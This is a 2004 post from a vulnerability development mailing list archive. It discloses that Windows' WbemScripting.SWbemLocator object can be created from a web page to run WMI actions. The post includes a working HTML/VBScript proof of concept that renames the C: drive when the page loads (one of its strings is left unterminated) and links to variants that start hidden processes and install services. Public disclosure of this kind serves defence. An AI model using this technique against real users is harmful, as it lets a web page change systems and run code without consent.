Vulnerability Development mailing list archives
WbemScripting.SWbemLocator - createobject allows... EVERYTHING!
From: Bartosz Kwitkowski <bartosz () wb pl>
Date: 4 Mar 2004 21:24:27 -0000
I would like to dedicate this discovery to Justyna. WbemScripting.SWbemLocator - this object has access to WMI in Win XP ( i have Prof fully patched). , 2003 , any NT? I think, this vuln concerns all Windows where we can find WbemScripting.SWbemLocator. I would not like to publish more exploits because of their dangerous use more examples are at: http://wb.pl/bartosz/wbem/process.htm - create process in hidden window http://wb.pl/bartosz/wbem/installservice.htm - installs service http://wb.pl/bartosz/wbem/changevolume.htm - changes volume of C: HOME PAGE - http://wb.pl/bartosz/ example source: <HTML> <HEAD> <TITLE>Change volume of disk</TITLE> <SCRIPT LANGUAGE="VBScript"> // I would like to dedicate this discovery to Justyna. Sub window_onload const impersonation = 3 Set Locator = CreateObject("WbemScripting.SWbemLocator") Set Service = Locator.ConnectServer() Service.Security_.ImpersonationLevel=impersonation Set Process = Service.Get("Win32_LogicalDisk=""C:""") Process.VolumeName = "bartosz kwitkowski Process.Put_ end sub </SCRIPT> </HEAD> <BODY> I would like to dedicate this discovery to Justyna. </BODY> </HTML> ANY QUESTIONS? ASK ME!
Current thread:
- WbemScripting.SWbemLocator - createobject allows... EVERYTHING! Bartosz Kwitkowski (Mar 04)